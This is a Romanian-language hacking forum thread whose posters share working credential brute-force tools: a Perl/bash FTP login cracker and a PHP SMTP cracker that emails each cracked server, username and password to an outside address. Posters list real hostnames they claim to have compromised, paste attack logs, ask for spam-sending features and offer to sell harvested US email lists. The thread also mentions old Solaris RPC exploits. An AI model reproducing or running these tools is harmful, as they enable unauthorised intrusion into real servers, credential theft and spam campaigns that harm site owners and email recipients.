galford

Linkul nu mai este valabil. Rehost!

Multumesc hKr pentru tips. O sa il testez maine si revin cu feedback. LE: Testat si functioneaza ca uns. Un tip pentru a scoate din lista de ip-uri C blocks. awk -F. '!class[$1,$2,$3] { print $0; class[$1,$2,$3]=1; }' < lista_hosts > newfile

Anyway... cele mai eficiente brute-uri de smtp-uri cu sendemail support nu sunt publice. Cel putin eu mi l-am facut singur dupa ce am stat 3 zile pe forumuri, unix.com si citind zeci de tutoriale. Asa ca daca vrei ceva eficient ia-ti un bax de coca cola, inarmeaza-te cu rabdare si treci la treaba. Am facut un post mai devreme cu scriptul de brute pe care-l folosesc. Mai departe va descurcati. Bafta!

iei de pe google. sunt tone! http://ftp.sliim-projects.eu/wordlists/ de exemplu

Cum functioneaza. Incearca brute la user/password (definite in fisierul pass_file) la toate hostname-urile dintr-un fisier (linie-dupa-linie, fisier implicit logfile) salvand intr-un fisier definit ip user password (ftp.log). Nu l-am facut multi-thread pentru ca sincer mi-a fost lene. Sursa: do for ip in $(cat logfile) do while read USR PAS do perl x.pl $ip $USR $PAS done < pass_file done x.pl #!/usr/bin/perl use Net::FTP; my $host = $ARGV[0]; my $user = $ARGV[1]; my $pass = $ARGV[2] || ""; my $port = "21"; $ftp=Net::FTP->new("$host", Port=>"$port", Timeout => 5) or die("couldn't connect to host:" . $host . " on port " . $port); if($ftp->login("$user","$pass")) { print "Login found: $host $user $pass\n"; open (MYFILE, '>>ftp.log'); print MYFILE "$host $user $pass\n"; close (MYFILE); } $ftp->close(); Exemplu pass_file: shop shop sales sales orders orders shop password shop 123456 Sa il faca cineva multithread-ing si sa-l posteze aici. Si sa mai adauge in cazul in care un ip din lista da timeout ... sa treaca la urmatorul ip nu sa stea sa incerce toate parolele. Galford D. Weller - galford@inbox.com Hostname owned cu acest tool: www.atminformatica.com.br movie.cluecian.com mail.orgltd.com toystory.overland.cl Toate cu access la DocumentRoot. Proof of concept: root@admin [/dev/shm/ftpd]# cat logfile toystory.overland.cl root@admin [/dev/shm/ftpd]# ./do Login found: toystory.overland.cl webmaster XXXX root@admin [/dev/shm/ftpd]# cat ftp.log toystory.overland.cl webmaster XXXX Enjoy. PS: Nu l-am facut eu de la 0. Ci doar am luat un perl script de pe google si am luat doar ceea ce-mi trebuie mie. SURSA: http://www.perlmonks.org/bare/?displaytype=displaycode;node_id=352761

Te-ai complicat enorm. Puteai extrage doar ce-ti trebuie din phpmailer. <?php error_reporting(0); $_UserFile = "user.file"; $_PassFile = "pass.file"; function S_Server($_server, $_username, $_password) { print "[+]Found $_username/$_password on $_server\r\n"; if(!($_OutFile = fopen("cracked.smtp", "a"))) ExitF ("Cannot open the lo g file"); fputs($_OutFile, "[+]Cracked: $_server $_username $_password\r\n"); fclose($_OutFile); exit(0); } function ExitF($errmsg) { print "[-]" . $errmsg . "\r\n"; exit(0); } function CrackSMTP($server, $username, $password) { $socket = fsockopen($server, 25, $errno, $errstr, 2); if (!$socket) ExitF ("SOCKET ERROR!"); stream_set_timeout($socket, 2); $_SockResult = fgets($socket, 512); if (substr(trim($_SockResult), 0, 3) != "220") ExitF ("220 Error"); fputs($socket, "EHLO USER\r\n"); $_SockResult = fgets($socket, 512); while(substr(trim($_SockResult), 0, 4) == "250-") $_SockResult = fgets($ socket, 512); fputs($socket, "AUTH LOGIN\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("AUTH LOGIN Error"); if (substr(trim($_SockResult), 4, 16) != "VXNlcm5hbWU6") ExitF ("RECEIVE USER PROMPT Error"); $Encrypt_User = base64_encode($username); fputs($socket, "$Encrypt_User\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND USER Error"); if (substr(trim($_SockResult), 4, 16) != "UGFzc3dvcmQ6") ExitF ("RECEIVE PASSWORD PROMPT Error"); $Encrypt_Password = base64_encode($password); fputs($socket, "$Encrypt_Password\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("SEND PASSWORD Error") ; if (substr(trim($_SockResult), 0, 3) != "235") { print "$server: $username/$password - INVALID\r\n"; return "INVALID"; } fputs($socket, "RSET\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("RSET Error"); fputs($socket, "MAIL FROM: admin@xoffice.com\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("MAIL FROM Error"); fputs($socket, "RCPT TO: galford@inbox.com\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("RCPT TO Error"); fputs($socket, "DATA\r\n"); if (!($_SockResult = fgets($socket, 512))) ExitF ("DATA Error"); fputs($socket, "Content-Type: text/html\r\n"); fputs($socket, "SUBJECT: Elite Server $server $username $password\r\n"); fputs($socket, "FROM: SMTP Admin <admin@xoffice.com>\r\n"); fputs($socket, "TO: galford@inbox.com\r\n"); fputs($socket, "\r\n Happy New Year\r\n $server $username $password\r\n. \r\n"); fputs($socket, "QUIT\r\n"); fclose($socket); S_Server ($server, $username, $password); exit(0); } if (!($_SRV = $argv[1])) ExitF ("Usage: $argv[0] <hostname>"); if (!($F_UserFile = fopen($_UserFile, "r"))) ExitF ("Cannot open the username fi le"); $_Var = 0; $_Counter = 0; while (!feof($F_UserFile)) { $_username = fgets($F_UserFile, 64); $username = str_replace("\n", "", $_username); if ($username != "") { $user[$_Var] = $username; $pass[$_Var] = $username; $_Var++; $_Counter = $_Counter + 1; $user[$_Var] = $username; $pass[$_Var] = $username . "1"; $_Var++; $_Counter = $_Counter + 1; $user[$_Var] = $username; $pass[$_Var] = $username . "12"; $_Var++; $_Counter = $_Counter + 1; $user[$_Var] = $username; $pass[$_Var] = $username . "123"; $_Var++; $_Counter = $_Counter + 1; if (!($F_PassFile = fopen($_PassFile, "r"))) ExitF ("Cannot open the password file"); while (!feof($F_PassFile)) { $user[$_Var] = $username; $pass[$_Var] = fgets($F_PassFile, 64); $pass[$_Var] = str_replace("\n", "", $pass[$_Var]); $_Var++; $_Counter++; } fclose($F_PassFile); } } fclose ($F_UserFile); for ( $_Var = 0; $_Var < $_Counter; $_Var++ ) CrackSMTP($_SRV, $user[$_Var], $pa ss[$_Var]); exit(0); ?> Incearca procedurea asta. E mai clean si nu face load average absolut deloc. root@admin [/dev/shm/.img]# ps -eaf | grep -c smtp.php 99 root@admin [/dev/shm/.img]# Uite la 99 procese pornite ce load average: root@admin [/dev/shm/.img]# w 20:42:21 up 1 day, 3 min, 2 users, load average: 0.37, 0.50, 0.68 SMTP brute-ul meu arata ceva de genul in action: 109.167.132.120: antonio/letmein - INVALID 109.168.123.58: test/mypass - INVALID 109.164.235.34: henry/1234567 - INVALID 109.123.106.182: charles/charles - INVALID 109.168.125.210: online/online - INVALID 109.168.122.135: spam/secret - INVALID 109.164.219.206: patrick/letmein - INVALID 109.164.235.113: gary/secret - INVALID 109.168.58.134: benjamin/12345678 - INVALID 109.168.123.54: test/123456789 - INVALID 109.164.235.168: henry/password - INVALID 109.168.31.114: randy/123456789 - INVALID 109.164.143.33: roger/roger - INVALID 109.168.28.18: billy/billy123 - INVALID

ah .. intelesesem gresit then.

Testat si functioneaza. Totusi daca ai putea adauga si send email support. Sa foloseasca un *.html extern ca message body si intr-un alt fisier mail to: si mail from: etc etc. ar fi excelent. Greets from BZ.

Vand si eu emailuri fresh bussiness de USA, extrem de multe.

Chiar si in 2009 erau useless. Cam prin 2004-2005 erau cat de cat eficiente.

rpc.cachefsd si rpc.cmdsol au fost exploit-able acum ceva vreme. Merge doar pe solaris 2.6/2.7 nepatched. Useless la fel ca si cel pentru sadmind. A fost odinioara...